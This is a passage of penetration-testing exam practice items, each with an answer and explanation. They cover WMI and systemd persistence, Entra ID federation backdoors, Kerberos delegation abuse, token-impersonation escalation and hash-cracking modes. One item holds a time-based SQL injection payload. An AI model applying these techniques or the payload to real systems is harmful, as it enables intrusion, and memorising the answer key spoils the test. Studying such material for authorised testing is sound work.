Persistence is often detected via common registry keys like Run or RunOnce. Using Windows Management Instrumentation (WMI) event subscriptions allows for persistence that is harder to detect. By creating an EventFilter and EventConsumer, an attacker can trigger a malicious script based on system events, such as a specific time or system uptime, bypassing traditional registry-based forensic analysis and providing a robust, fileless-like execution method.

Exam trap

Candidates often suggest common techniques like Run keys or startup folders, overlooking that these are heavily monitored. WMI is chosen specifically for its ability to operate stealthily without registry modifications.

31
MCQeasy

During a penetration test on a Linux system, you have gained root access and want to ensure that your backdoor survives system reboots. Which of the following methods is the most reliable and commonly used for this purpose?

A.Create a systemd service unit that runs your payload at startup.
B.Add your payload to the /etc/rc.local file.
C.Add a cron job with @reboot schedule that executes your payload.
D.Modify the root user's .bash_profile to execute your payload on login.
AnswerA

Systemd is the default init system on most modern Linux distributions, and creating a service unit ensures your payload runs at system startup. It is reliable, persistent across reboots, and can be configured to run as root. This method is commonly used by attackers and is less likely to be removed accidentally. It provides a robust backdoor that starts early in the boot process.

Why this answer

Creating a systemd service unit is the most reliable method for ensuring a backdoor runs at system startup on modern Linux distributions. Systemd is the standard init system, and service units are executed automatically during boot. This method is persistent, can run with root privileges, and is less likely to be disabled by default than legacy mechanisms like rc.local or cron @reboot.

Exam trap

The trap here is assuming that legacy methods like rc.local or cron @reboot are universally reliable, when in fact systemd is the standard on most current Linux systems and provides more consistent startup execution.

32
MCQeasy

Which of the following is considered a 'client-side' exploitation scenario?

A.Exploiting an unpatched web server service.
B.Tricking a user into opening a malicious PDF.
C.Attacking an open database port.
D.Brute-forcing an SSH login on a server.
AnswerB

Opening a document in a client application like a PDF viewer is a quintessential client-side attack. The attacker leverages a vulnerability in the client software that is triggered by the user's action, effectively gaining control over the user's local machine through their interaction with the malicious file.

Why this answer

Client-side exploitation involves targeting an application running on a user's machine, such as a browser, document viewer, or email client. Unlike server-side exploitation, which targets a persistent service, client-side attacks rely on tricking a user into interacting with a malicious resource. This shift in vector requires testers to consider social engineering and user behavior as key components of the attack chain, which is distinct from direct network-based vulnerability exploitation.

Exam trap

Candidates often confuse client-side attacks with server-side service exploitation, failing to realize that client-side attacks require user interaction to trigger the vulnerability.

33
MCQeasy

A penetration tester has completed an unauthenticated vulnerability scan of a web server and received a report listing several critical CVEs. Before including these in the final report, the tester wants to validate that the findings are not false positives. Which action is the MOST appropriate next step?

A.Lower the scan's severity threshold and rescan to see if more issues appear.
B.Re-run the scan with a different scanner and compare results.
C.Manually verify the finding by checking the actual service version and testing the vulnerability.
D.Assume the scanner is correct and include the finding as critical.
AnswerC

Manual verification, such as banner grabbing, checking file versions, or safely reproducing the vulnerability, provides definitive proof. Scanners infer vulnerabilities from version strings or indirect indicators, which can be wrong. By directly inspecting the service and testing the specific issue, the tester eliminates false positives and can confidently report the finding with evidence.

Why this answer

Manual verification is the gold standard for confirming scanner findings. By directly checking the service version, inspecting configuration, or safely testing the vulnerability, the tester obtains evidence that the issue is real. This eliminates false positives and ensures the report is accurate.

Other options either do not validate the specific finding or risk reporting unverified critical issues.

Exam trap

The trap here is thinking that rescanning or using another tool validates a finding, when only direct manual confirmation proves the vulnerability exists.

34
MCQmedium

Which phase of a vulnerability assessment typically involves comparing the output against a known database of CVEs?

A.Host Discovery
B.Service Identification
C.Vulnerability Detection
D.Remediation Verification
AnswerC

Vulnerability detection is the phase where the scanner maps the software versions identified on the target against its internal CVE database. This process identifies known flaws associated with those specific versions and generates the reports that security teams use for remediation and risk prioritization.

Why this answer

After performing reconnaissance and data collection, the scanner matches discovered software versions and configurations against a vulnerability database. This matching phase is where the raw data is translated into actionable information. Understanding this is crucial because it highlights that the scanner's efficacy is strictly tied to the quality and recency of its signature database, which must be updated regularly to identify modern threats.

Exam trap

Candidates often confuse the 'Vulnerability Detection' phase with 'Reconnaissance' or 'Reporting'. They fail to recognize that the actual matching of CVEs occurs only after data collection.

35
MCQeasy

You are performing a penetration test against a web server and want to identify the exact version of the HTTP service running on port 80. Which Nmap command should you use?

A.nmap -sS -p 80 <target>
B.nmap -sV -p 80 <target>
C.nmap -sn -p 80 <target>
D.nmap -O -p 80 <target>
AnswerB

The -sV option enables service version detection, which probes the open port and analyzes the responses to identify the application name, version, and sometimes additional details. Combined with -p 80, it targets the HTTP service specifically, making it the correct choice for identifying the web server version.

Why this answer

Service version detection with -sV is the correct technique to identify the software and version running on an open port. It sends probes and compares responses against a signature database, providing the HTTP server version needed for further vulnerability assessment.

Exam trap

The trap here is confusing OS detection or port state scanning with service version detection, which specifically identifies application software and versions on open ports.

36
MCQhard

During a penetration test, you have gained access to a Microsoft Entra ID tenant with Global Administrator privileges. You want to establish a backdoor that allows you to authenticate as any user in the tenant without knowing their password, even if your Global Administrator account is removed. Which of the following methods would best achieve this?

A.Assign the 'Company Administrator' role to a service principal.
B.Create a new user account with the same privileges as a Global Administrator.
C.Add a new credential to an existing application with high privileges.
D.Modify the tenant's federation settings to point to an attacker-controlled identity provider.
AnswerD

By modifying the federation settings to trust an attacker-controlled identity provider, you can forge SAML tokens for any user in the tenant. This allows you to authenticate as any user, including Global Administrators, without knowing their passwords. This backdoor persists even if your Global Administrator account is removed, as long as the federation settings remain unchanged. This is a known persistence technique.

Why this answer

Modifying the tenant's federation settings to trust an attacker-controlled identity provider allows the attacker to forge SAML tokens for any user. This backdoor is highly persistent because it survives the removal of the attacker's Global Administrator account. It enables authentication as any user without knowing their password, making it an effective persistence mechanism.

Exam trap

The trap here is focusing on creating or modifying accounts, which are easily removed, while the most persistent backdoor is altering the tenant's trust configuration to enable token forgery.

37
MCQhard

You are scanning a target that resides behind a firewall configured to drop TCP packets with the ACK flag set. You want to determine whether the firewall is stateful or stateless. Which Nmap scan type should you use to help make this determination by analyzing the responses to ACK packets?

A.UDP scan (-sU)
B.TCP FIN scan (-sF)
C.TCP ACK scan (-sA)
D.TCP connect scan (-sT)
AnswerC

The TCP ACK scan sends ACK packets to target ports. A stateful firewall will typically drop unsolicited ACKs, resulting in a 'filtered' state, while a stateless firewall may allow them and the host will respond with RST, showing 'unfiltered'. By analyzing whether ports are filtered or unfiltered, you can infer the firewall's nature, making this the correct choice.

Why this answer

The TCP ACK scan is specifically designed to map firewall rulesets and determine if they are stateful. By sending ACK packets, it elicits different responses from stateful versus stateless firewalls. Stateful firewalls drop unsolicited ACKs, while stateless firewalls may allow them, causing the host to respond with RST.

This differential response is the key to the determination.

Exam trap

The trap here is confusing ACK scan with other scan types that also manipulate TCP flags, such as FIN or NULL scans, which serve different purposes.

38
Multi-Selecthard

A penetration tester has compromised a workstation and obtained a Kerberos TGT for a low-privileged domain user. The tester wants to abuse unconstrained delegation configured on a member server named APP01 to escalate privileges. Which two actions are required to achieve this? (Choose two.)

Select 2 answers
A.Request a service ticket for the krbtgt account using the compromised user's TGT.
B.Extract the cached TGT from APP01 and inject it into the tester's session for reuse.
C.Disable Kerberos pre-authentication on the compromised user account to facilitate ticket capture.
D.Coerce a domain controller to authenticate to APP01 so its TGT is captured in memory.
E.Modify the msDS-AllowedToDelegateTo attribute on APP01 to include the domain controller.
AnswersB, D

Once the domain controller's TGT is cached on APP01, extracting it with a tool such as Rubeus or Mimikatz and injecting it into the tester's session allows the tester to impersonate the DC. Presenting that TGT yields a service ticket with domain controller privileges, enabling DCSync or other high-impact actions.

Why this answer

Abusing unconstrained delegation requires forcing a high-value account, such as a domain controller, to authenticate to the delegation-enabled host so its TGT is cached, then extracting and reusing that TGT. Coercion techniques place the DC's TGT on APP01, and extraction tools enable impersonation, leading to domain compromise.

Exam trap

The trap here is assuming the low-privileged user's own TGT is sufficient, when the attack depends on capturing a domain controller's TGT that is cached on the unconstrained delegation host.

39
MCQmedium

You are conducting external reconnaissance against a target that uses a split-horizon DNS configuration. From the public internet, you query the organization's authoritative name server for the A record of vpn.contoso.com and receive NXDOMAIN. However, you have obtained a leaked internal zone file that shows the same hostname resolving to 10.10.10.50. Which technique would best allow you to identify additional internal-only hostnames without sending traffic to the target's internal network?

A.DNS cache snooping against the recursive resolver used by the organization
B.Zone transfer (AXFR) against each authoritative name server for the domain
C.Certificate transparency log enumeration for the domain
D.Reverse DNS (PTR) lookups against the 10.0.0.0/8 private address space
AnswerC

Certificate transparency logs record every publicly trusted TLS certificate issued for a domain, including subject alternative names. Organizations frequently request certificates for internal-only hostnames, and those names appear in the logs even when public DNS returns NXDOMAIN. Querying CT logs such as crt.sh for contoso.com can therefore reveal internal hostnames without touching the internal network, directly satisfying the requirement.

Why this answer

Certificate transparency logs are a public, append-only record of issued certificates, and they routinely capture subject alternative names for hosts that never appear in public DNS. Because the organization uses split-horizon DNS, public queries return NXDOMAIN for internal names, but the CT logs still disclose them. Querying a CT aggregator for the domain yields those internal hostnames without any traffic to the internal network.

Exam trap

The trap here is assuming that a failed public DNS lookup means a hostname is undiscoverable, when certificate transparency logs can still leak internal names.

40
MCQeasy

During a penetration test, you obtain a password hash from a Linux system's /etc/shadow file. The hash starts with '$6$'. Which Hashcat mode should you use to crack it?

A.Hashcat mode 3200 (bcrypt)
B.Hashcat mode 1800 (sha512crypt)
C.Hashcat mode 500 (md5crypt)
D.Hashcat mode 1500 (DEScrypt)
AnswerB

The '$6$' prefix indicates a SHA-512 crypt hash, commonly used on Linux systems. Hashcat mode 1800 is designed for sha512crypt hashes. Using this mode ensures correct parsing of the salt and hash, allowing efficient cracking. It is the standard mode for modern Linux password hashes.

Why this answer

The '$6$' prefix unambiguously identifies a SHA-512 crypt hash. Hashcat mode 1800 is specifically built for this format, ensuring correct salt handling and efficient cracking. Other modes correspond to different hash algorithms and would not successfully crack the hash.

Exam trap

The trap here is misidentifying the hash type based on prefix, leading to the wrong Hashcat mode.

41
Multi-Selecthard

You are performing a penetration test against a Windows domain and have obtained domain user credentials. You want to identify which domain controllers are vulnerable to a specific privilege escalation technique. Which TWO tools or techniques are most appropriate for enumerating domain controllers and their potential vulnerabilities? (Choose two.)

Select 2 answers
A.BloodHound with SharpHound collector
B.Nmap with the smb-enum-shares script
C.PowerView's Get-NetDomainController
D.Metasploit's auxiliary/scanner/smb/smb_version
E.Responder with LLMNR poisoning
AnswersA, C

BloodHound uses graph theory to reveal hidden relationships and attack paths in Active Directory. SharpHound collects data such as users, groups, computers, and sessions. It can identify domain controllers and potential privilege escalation paths, such as unconstrained delegation or ACL misconfigurations. This is a powerful tool for enumerating domain controllers and their vulnerabilities from a domain user perspective.

Why this answer

BloodHound with SharpHound and PowerView's Get-NetDomainController are both designed to enumerate Active Directory environments, including domain controllers. BloodHound maps attack paths and can highlight misconfigurations like unconstrained delegation, while PowerView directly queries domain controller information. Other tools like Nmap SMB scripts, Metasploit SMB scanner, and Responder focus on different aspects such as share enumeration, version scanning, or credential capture, and do not provide the specific domain controller vulnerability enumeration required.

Exam trap

The trap here is confusing general SMB enumeration tools with those that specifically map Active Directory attack paths and domain controller misconfigurations.

42
MCQhard

What is the primary risk of using 'Domain Fronting' in a C2 architecture during a penetration test?

A.It will trigger an immediate alert on all EDR agents.
B.It can cause accidental disruption to legitimate services.
C.It is easily detectable by standard firewall port filtering.
D.It forces the malware to use a non-standard protocol.
AnswerB

Because domain fronting shares infrastructure with legitimate traffic, blocking the C2 traffic often requires blocking the entire CDN host header or IP range. Doing this in a production environment during a penetration test could inadvertently block legitimate business applications, leading to significant operational downtime and client dissatisfaction.

Why this answer

Domain fronting relies on the trust placed in large Content Delivery Networks (CDNs). If a penetration tester uses a high-traffic, reputable CDN for C2, the organization's defense team may be unable to block the C2 traffic without also blocking legitimate business services that share the same CDN infrastructure. This creates a significant conflict between security needs and operational availability, which must be carefully managed during the engagement.

Exam trap

Examinees often think domain fronting risks involve immediate decryption by firewalls or automatic host crashing, ignoring the operational dilemma it causes for defenders.

43
MCQhard

When escalating privileges using a Kernel exploit, why is it considered a high-risk activity for a penetration test?

A.It requires the user to have administrative credentials.
B.It frequently causes system instability and crashes.
C.It is easily detected by standard antivirus software.
D.It can only be executed on outdated operating systems.
AnswerB

Kernel exploits manipulate memory structures at a very low level. Small errors in memory alignment or incorrect assumptions about the OS state lead to immediate kernel panics or crashes. This downtime is a major business impact, making kernel exploits the highest-risk category of penetration testing activities.

Why this answer

Kernel exploits target the core of the operating system. If the exploit fails or contains errors, it frequently leads to a system crash (Blue Screen of Death). This causes significant downtime for the client, which is usually prohibited.

Because kernel-level code runs with the highest possible privilege, any mistake results in immediate system instability, making it one of the most dangerous vectors to test in a production environment.

Exam trap

Candidates often focus on the 'success' of the exploit rather than the 'risk' to the system, ignoring that kernel crashes are a primary concern in production environments.

44
MCQmedium

Refer to the exhibit. What does this error log suggest regarding the C2 connection attempt?

A.The C2 server is unreachable due to a network outage.
B.The client system does not trust the C2 server's certificate.
C.The C2 server is performing a man-in-the-middle attack.
D.The C2 server has exhausted its connection limit.
AnswerB

This specific TLS alert signifies that the client received a certificate it could not verify against its local root store. This is a common indicator that the C2 infrastructure is using a self-signed certificate, which the client is configured to reject due to strict security settings.

Why this answer

The 'tlsv1 alert unknown ca' error indicates that the client rejected the server's certificate because it was not signed by a trusted root CA. In the context of C2, this often happens when an automated beacon tries to connect to an infrastructure node using a self-signed certificate, and the host's security policy or a proxy is performing SSL inspection and fails the trust validation process.

Exam trap

Candidates often assume this error means the server is down or the network is blocked. They miss that the error is specifically a certificate validation failure by the client system.

45
Multi-Selectmedium

You are performing a reconnaissance task and need to identify the physical location or ownership of an organization's IP space. Which TWO of the following services are standard for this task?

Select 2 answers
A.WHOIS lookups
B.GeoIP databases
C.SSH brute-force tools
D.Packet sniffing on the target's Wi-Fi
E.Web browser history inspection
AnswersA, B

WHOIS is the standard protocol for querying registration databases. It provides the owner, administrative contact, and registered netblocks for a given domain or IP range. This is fundamental for reconnaissance as it confirms the legal and administrative scope of the assets being tested during the engagement.

Why this answer

WHOIS and GeoIP databases are the industry standard for mapping network ownership and physical presence. WHOIS provides the registrant details for netblocks, while GeoIP services attempt to map IP addresses to physical coordinates. Together, they help a penetration tester understand the geographic footprint and administrative ownership of the target infrastructure, which is essential for accurate scoping and reporting of findings.

Exam trap

Students often choose internal vulnerability scanners or packet analyzers, missing that WHOIS and GeoIP are the standard services for identifying IP space location and ownership.

46
MCQeasy

What is the purpose of the 'meterpreter' payload in the Metasploit framework?

A.To perform network scanning
B.To provide an extensible, memory-only command interface
C.To encode payloads for bypass
D.To generate shellcode for hardware
AnswerB

Meterpreter is designed to run in memory, minimizing its footprint on the target system. It offers a wide range of extensible commands that allow the penetration tester to interact with the system, escalate privileges, and maintain access, all while remaining highly resilient against traditional file-based signature detection methods.

Why this answer

Meterpreter is a sophisticated, memory-resident payload that provides an advanced interactive shell. It operates entirely in memory, which helps it evade disk-based antivirus detection. Its importance lies in its extensibility; it allows testers to load modules dynamically, perform file system operations, dump memory, and migrate processes without writing files to the disk, making it a critical component for stealthy and efficient post-exploitation operations in modern security assessments.

Exam trap

Candidates often confuse Meterpreter with a standard reverse shell or a persistence mechanism, failing to realize its core advantage is its memory-only, extensible architecture that avoids writing to the disk.

47
Multi-Selecthard

Which THREE of the following are valid methods to mitigate the risk of password spray attacks in an integrated Azure AD environment?

Select 3 answers
A.Enforce Multi-Factor Authentication for all users.
B.Disable all legacy authentication protocols.
C.Implement Identity Protection to detect and block risky sign-ins.
D.Increase the minimum password length to 50 characters.
E.Require all users to use the same password for both on-premises and cloud.
AnswersA, B, C

MFA is the most effective control against password spraying. Even if an attacker guesses the password, the secondary factor prevents them from gaining access. It neutralizes the utility of the guessed credential, forcing the attacker to find another way to circumvent the authentication process entirely.

Why this answer

Password spray attacks target common passwords across many accounts. Protecting against this requires a layered approach: enforcing MFA to render weak passwords useless, blocking legacy authentication to prevent bypasses, and utilizing identity protection to detect anomalous logins. These controls are essential for modernizing identity security and protecting against high-volume, low-effort credential attacks that plague hybrid environments.

Exam trap

Candidates often select controls like self-service password reset or password complexity rules, which fail to specifically address password spray attacks targeting multiple accounts with common passwords.

48
MCQhard

During a penetration test on a Linux server, you find a cron job that runs every minute as root: '*/1 * * * * root /usr/local/bin/backup.sh'. The script is owned by root but has permissions 777. You are a low-privileged user. What is the most direct way to escalate privileges?

A.Create a malicious shared library and use LD_PRELOAD in the script's environment.
B.Use the cron job to copy /etc/shadow to a world-readable location.
C.Modify the backup.sh script to include a reverse shell command.
D.Replace the /usr/local/bin/backup.sh with a symbolic link to /bin/bash.
AnswerC

Since the script is world-writable (777), you can edit it to execute arbitrary commands. The cron job runs as root every minute, so your modified script will execute with root privileges. Adding a reverse shell or copying /bin/bash with SUID will grant you root access. This is a direct and reliable escalation because you control the script's content and it runs as root without any additional checks.

Why this answer

The most direct escalation is to modify the world-writable script because it runs as root every minute. By adding a command to create a reverse shell or copy /bin/bash with SUID permissions, you gain root access. Other methods like LD_PRELOAD or symlinking are less reliable or indirect.

The writable script is a clear privilege escalation vector.

Exam trap

The trap here is overcomplicating the escalation when a simple file write to a root-executed script is available; testers sometimes overlook the obvious writable script.

49
MCQeasy

When conducting a network scan, you notice that many hosts are not responding to ping requests, even though they are known to be online. What is the most appropriate Nmap flag to use to ensure these hosts are still scanned for open ports?

A.-sP (Ping scan)
B.-Pn (No ping)
C.-PR (ARP ping)
D.-sn (Disable port scan)
AnswerB

The -Pn flag instructs Nmap to treat all hosts as online. It skips the ping discovery phase entirely, allowing the scanner to attempt port probes on every target regardless of whether they respond to ICMP. This is necessary for scanning hosts that are protected by ICMP-blocking firewalls.

Why this answer

The -Pn flag is the standard solution when hosts are configured to drop ICMP traffic. It forces Nmap to skip the host discovery phase and proceed directly to port scanning, assuming that every target is 'up'. This is a fundamental technique for penetration testers, as security-conscious organizations often disable ICMP at the perimeter to prevent basic discovery by automated tools and internal network scanning.

Exam trap

Candidates often confuse -Pn with -sS or -sV. They think -Pn is a scanning technique for ports, but it is strictly a host discovery bypass flag.

50
MCQmedium

During an internal assessment, you gain a foothold as a low-privileged domain user on a Windows Server 2019 host that is a member of an Active Directory domain. You run whoami /priv and observe SeImpersonatePrivilege enabled in your token. You need to escalate to NT AUTHORITY\SYSTEM on this host. Which technique is most appropriate?

A.Run a Kerberoasting attack against all service accounts and crack the resulting RC4 hashes offline to obtain a domain administrator password.
B.Extract cached domain credentials from the registry using reg save on the SAM and SYSTEM hives and crack them with hashcat.
C.Abuse SeImpersonatePrivilege with a token impersonation tool such as JuicyPotato, RoguePotato, or PrintSpoofer, depending on the OS build.
D.Perform an unquoted service path attack by placing a malicious executable in a directory whose path contains a space and is writable.
AnswerC

SeImpersonatePrivilege lets a process impersonate a token handed to it by a client, and tools like PrintSpoofer or the Potato family coerce a SYSTEM-privileged service into authenticating so the token can be captured and reused. On Server 2019 the classic JuicyPotato CLSID path is patched, so PrintSpoofer or RoguePotato is the working variant here.

Why this answer

SeImpersonatePrivilege allows a process to take on the security context of a token it receives, and privileged Windows services can be coerced into connecting to an attacker-controlled listener. Tools such as PrintSpoofer and RoguePotato exploit that behavior to obtain a SYSTEM token on modern Windows builds where older Potato techniques no longer work. Because the privilege is already present in the token, this is the direct escalation route.

Exam trap

The trap here is assuming any Potato tool works on any Windows build, when patched builds like Server 2019 require PrintSpoofer or RoguePotato instead of the classic JuicyPotato CLSID abuse.

51
MCQeasy

A penetration tester is performing a password audit and has obtained a set of NTLM hashes from a Windows system. The tester wants to use Hashcat to crack these hashes but needs to choose the correct mode. Which Hashcat mode should be used for NTLM hashes?

A.Hashcat mode 3000
B.Hashcat mode 5500
C.Hashcat mode 5600
D.Hashcat mode 1000
AnswerD

Hashcat mode 1000 is specifically for NTLM hashes. NTLM hashes are MD4-based and are commonly found in Windows environments. Using mode 1000 allows Hashcat to correctly parse and crack these hashes. This is the standard mode for NTLM and is widely used in penetration testing when dealing with Windows password hashes extracted from SAM or NTDS.dit files.

Why this answer

NTLM hashes are MD4-based and are cracked using Hashcat mode 1000. This mode correctly interprets the hash format and applies the appropriate algorithm. Other modes target different hash types such as NetNTLMv1, NetNTLMv2, or LM, and will not work for NTLM hashes.

Therefore, mode 1000 is the only correct choice for this scenario.

Exam trap

The trap here is confusing NTLM with NetNTLMv1 or NetNTLMv2, leading to selection of the wrong Hashcat mode.

52
MCQmedium

During a post-exploitation phase, you identify an unquoted service path vulnerability on a Windows target. What is the most reliable way to escalate privileges through this misconfiguration?

A.Overwrite the existing service executable with a custom payload.
B.Modify the service configuration using the sc config command.
C.Place a malicious binary at the first detected space-delimited path segment.
D.Inject a DLL into the running service process memory space.
AnswerC

Windows attempts to execute the path segment before the space if no quotes are present. By placing a malicious executable at that specific location with the appropriate name, the service manager will execute your file instead of the intended one, running your code with the service's high-privilege context.

Why this answer

Unquoted service paths exist when the service binary path contains spaces and lacks quotes. Windows interprets the path incorrectly, searching for intermediate executables. Placing a malicious binary at the identified path allows it to execute with SYSTEM privileges upon service restart.

This technique is critical for privilege escalation as it exploits inherent Windows path resolution logic, often bypassing standard user restrictions if the directory has weak permissions.

Exam trap

Candidates often try to modify the existing service binary. They forget that the vulnerability relies on the path resolution order, requiring the placement of a new file, not modification.

53
MCQhard

Why are GPUs significantly more effective than CPUs for brute-forcing unsalted NTLM hashes?

A.GPUs have larger cache sizes for storing wordlists.
B.GPUs have a faster instruction set for MD4 algorithms.
C.GPUs handle massive parallel operations on simple math.
D.GPUs can bypass the salt requirement during the attack.
AnswerC

Because hashing is a simple mathematical function, a GPU's thousands of parallel cores can compute many hashes simultaneously. CPUs are better at sequential, complex logic, but for raw brute-force tasks, the parallel architecture of a GPU is vastly superior, enabling billions of attempts per second.

Why this answer

GPUs feature thousands of small, specialized cores designed for massive parallel processing, which is ideal for the simple, iterative nature of hashing. While a CPU excels at complex, branch-heavy tasks, a GPU can process thousands of password guesses simultaneously. For an unsalted algorithm like NTLM, this parallelism results in a performance increase of several orders of magnitude, allowing testers to exhaust large keyspaces in seconds rather than days.

Exam trap

Candidates often assume CPUs are better because of higher clock speeds, failing to realize that GPU architecture excels at massive parallel operations required by simple hashing algorithms.

54
MCQhard

During a vulnerability scan of a web application, the scanner reports a critical SQL injection vulnerability on a login form. A manual test using a single quote in the username field returns a generic error page with no database details. The scanner's evidence shows a time-based blind SQL injection payload that caused a five-second delay. Which action should the penetration tester take next to validate the finding?

A.Immediately report the SQL injection as a confirmed critical finding based on the scanner's time-based evidence.
B.Re-run the scanner with the same payload multiple times and compare the response times to confirm the delay is consistent.
C.Submit the login form with a benign username and password to check if the application returns a different error, then conclude the vulnerability is a false positive.
D.Manually inject a time-based payload that includes a conditional delay, such as '; IF (1=1) WAITFOR DELAY '0:0:5'--, and compare response times with a false condition.
AnswerD

Using a conditional time-based payload allows the tester to compare response times between true and false conditions. A consistent delay only when the condition is true confirms the injection point and rules out incidental latency. This is the standard manual validation technique for time-based blind SQL injection, providing strong evidence.

Why this answer

The most reliable way to confirm time-based blind SQL injection is to use a conditional payload that delays only when a true condition is met, and compare that with a false condition. This controls for network and server latency, demonstrating that the delay is caused by the injected SQL logic. Simply re-running the scanner or relying on a single delay is insufficient for validation.

Exam trap

The trap here is treating a single scanner-reported time delay as definitive proof, when blind SQL injection requires conditional testing to distinguish injection from incidental latency.

55
MCQeasy

A penetration tester obtains a password hash from a Linux system's /etc/shadow file that begins with $6$. Which statement correctly describes this hash and its implications for cracking?

A.It is a bcrypt hash and can be cracked using Hashcat mode 3200.
B.It is a SHA-512 crypt hash and can be cracked using Hashcat mode 1800.
C.It is a SHA-256 crypt hash and can be cracked using Hashcat mode 7400.
D.It is an MD5-based hash and can be cracked using Hashcat mode 500.
AnswerB

The $6$ prefix is the standard identifier for SHA-512 crypt in Linux shadow files. Hashcat mode 1800 is specifically designed for sha512crypt, which includes the salt and iteration count. This mode handles the variable rounds and salt, making it the correct choice for cracking this hash. Using the wrong mode would result in failure to recognize the hash format.

Why this answer

The $6$ prefix in /etc/shadow indicates SHA-512 crypt. Hashcat mode 1800 is the correct mode for cracking sha512crypt hashes. Other modes correspond to different algorithms: mode 500 for md5crypt, mode 3200 for bcrypt, and mode 7400 for sha256crypt.

Identifying the prefix correctly is essential to select the right cracking mode and avoid wasted effort.

Exam trap

The trap here is confusing the $6$ prefix with other common hash identifiers like $5$ for SHA-256 or $2a$ for bcrypt, leading to selection of an incompatible Hashcat mode.

56
MCQmedium

You are the lead penetration tester for a financial services client. During the scoping meeting, the client states they want to test their external perimeter but are concerned about accidental disruption to production trading systems. They ask you to propose a testing approach that minimizes operational risk while still validating exploitable vulnerabilities. Which of the following is the MOST appropriate recommendation?

A.Simulate an insider threat by deploying a physical implant in the data center to test physical security controls.
B.Conduct a vulnerability assessment with authenticated scans during off-peak hours and manually validate only critical findings.
C.Perform a full-scale denial-of-service test against the trading platform to assess resilience under attack conditions.
D.Execute a controlled penetration test using non-destructive exploitation techniques, with a defined stop condition for any sign of instability.
AnswerD

This approach directly addresses the client's need to validate exploitable vulnerabilities while minimizing operational risk. Non-destructive exploitation avoids payloads that could crash services, and a predefined stop condition ensures immediate halt if production stability is threatened. It aligns with standard penetration testing practices for sensitive environments and balances thoroughness with safety, making it the most appropriate recommendation.

Why this answer

The client requires validation of exploitable vulnerabilities with minimal risk to production. A controlled penetration test using non-destructive techniques and clear stop conditions achieves this by avoiding disruptive payloads and ensuring immediate cessation if instability occurs. It respects the client's risk tolerance while still providing meaningful security validation, unlike approaches that either disrupt services or fail to validate exploitability.

Exam trap

The trap here is assuming that any penetration test inherently risks production systems, when in fact non-destructive techniques and stop conditions can safely validate vulnerabilities.

57
MCQmedium

When evaluating the security of an organization's C2 detection capabilities, which log source is the most valuable for detecting DNS-based C2?

A.Endpoint system event logs.
B.Centralized DNS query logs.
C.Firewall traffic logs (Layer 4).
D.Antivirus detection logs.
AnswerB

DNS logs contain the full query history, including the requested domain names and the record types used. This is the most effective data source for detecting DNS tunneling, as it allows analysts to perform statistical analysis and identify patterns indicative of covert channels and malicious name resolution.

Why this answer

DNS query logs are the primary data source for identifying DNS-based C2. By analyzing these logs, security teams can identify anomalies such as high volumes of queries to a specific domain, unusual record types like TXT or NULL records, or domains with extremely high entropy. Without centralized DNS logging, detecting this specific type of C2 becomes nearly impossible, as the traffic occurs at the infrastructure level rather than the end-host level.

Exam trap

Students mistakenly choose endpoint antivirus logs or firewall packet captures, forgetting that DNS traffic happens entirely at the infrastructure level via name resolution.

58
MCQeasy

What is the primary purpose of a 'delta' or 'differential' vulnerability scan?

A.To increase the intensity of the scan to ensure all ports are covered.
B.To identify only the changes in the vulnerability posture since the last scan.
C.To bypass signature-based detection systems by using randomized payloads.
D.To perform an exhaustive search for zero-day vulnerabilities on all assets.
AnswerB

Differential scans compare the results of the current scan to a baseline, highlighting only what has been added, removed, or changed. This allows administrators to track new vulnerabilities introduced by recent updates or configuration changes without wasting resources re-scanning systems that have not changed state.

Why this answer

Delta scans focus on identifying changes in the environment since the last full assessment. By comparing current findings against a known baseline, testers can quickly isolate new vulnerabilities or unauthorized changes. This is vital for maintaining a continuous security posture, as it reduces scan times and allows security teams to prioritize remediation efforts on newly introduced risks without re-analyzing the entire stable environment.

Exam trap

Candidates often confuse delta scans with full vulnerability audits, mistakenly believing they are meant to discover all vulnerabilities rather than specifically focusing on identifying changes since the last assessment.

59
MCQmedium

When performing a penetration test, why is it safer to crack hashes offline rather than online?

A.Offline cracking is always faster than online methods.
B.Offline cracking prevents account lockouts.
C.Offline cracking allows for the use of more complex passwords.
D.Offline cracking is required to obtain the hash from memory.
AnswerB

Since offline cracking does not involve sending authentication requests to the target, the target's account lockout policy is never triggered. This allows the tester to run millions of attempts per second without any risk of locking out legitimate users, which is essential for maintaining service availability during an engagement.

Why this answer

Offline cracking is performed on the tester's own hardware, which means there is no network traffic generated towards the target system. This prevents the triggering of intrusion detection systems (IDS), account lockout policies, or audit logs that monitor failed authentication attempts. It provides a stealthy way to test password strength without risking operational disruption or alerting the client's defensive security team, which is the primary concern during a professional assessment.

Exam trap

Test-takers sometimes assume online cracking is faster or more direct, ignoring the severe risk of triggering account lockouts and security alerts.

60
MCQmedium

You are conducting an internal penetration test for a client that uses Microsoft Entra ID (Azure AD) with on-premises Active Directory. You have obtained a low-privileged domain user's credentials. You want to enumerate Entra ID users and groups without triggering sign-in logs on the compromised user. Which of the following techniques would be MOST effective for this goal?

A.Authenticate to Microsoft Graph with the compromised user's credentials and enumerate users and groups.
B.Use the Azure AD Connect synchronization account to query the Microsoft Graph API.
C.Use the Microsoft Entra admin center with the compromised user's credentials to browse users and groups.
D.Query the on-premises Active Directory for objects synchronized to Entra ID using the user's existing domain access.
AnswerD

Querying on-premises AD uses the user's existing domain authentication, which does not create Entra ID sign-in logs. Since synchronized objects exist in both directories, enumerating on-premises AD can reveal a significant portion of Entra ID users and groups without touching the cloud identity provider, achieving stealth.

Why this answer

The objective is to enumerate Entra ID objects without creating sign-in logs on the compromised user. Querying on-premises Active Directory leverages the existing domain session and does not generate cloud authentication events. This method can reveal synchronized users and groups, providing valuable intelligence while maintaining operational security.

Exam trap

The trap here is assuming that any cloud enumeration requires authenticating to Entra ID, overlooking that synchronized on-premises objects can be enumerated locally without generating cloud logs.

61
MCQhard

When a reverse shell connection fails to reach the listener, what is the best first step for troubleshooting?

A.Re-run the exploit with a different payload
B.Check local listener status and connectivity
C.Upgrade the Metasploit framework
D.Restart the target machine
AnswerB

The first step in troubleshooting is to ensure the listener is actually running and reachable. Checking if the LHOST is correct and if there is a firewall blocking the LPORT on the attacker's side is crucial, as this is the most common cause of failed reverse connections in laboratory environments.

Why this answer

Network connectivity issues are the most common reason for failed exploitation. Verifying the listener configuration and ensuring the target can actually reach the attacker's IP is the logical starting point. Using tools like 'netcat' to test the connectivity or verifying the LHOST settings ensures that the issue is not a simple misconfiguration, which saves significant time during a penetration test by eliminating basic networking errors before checking for complex security controls.

Exam trap

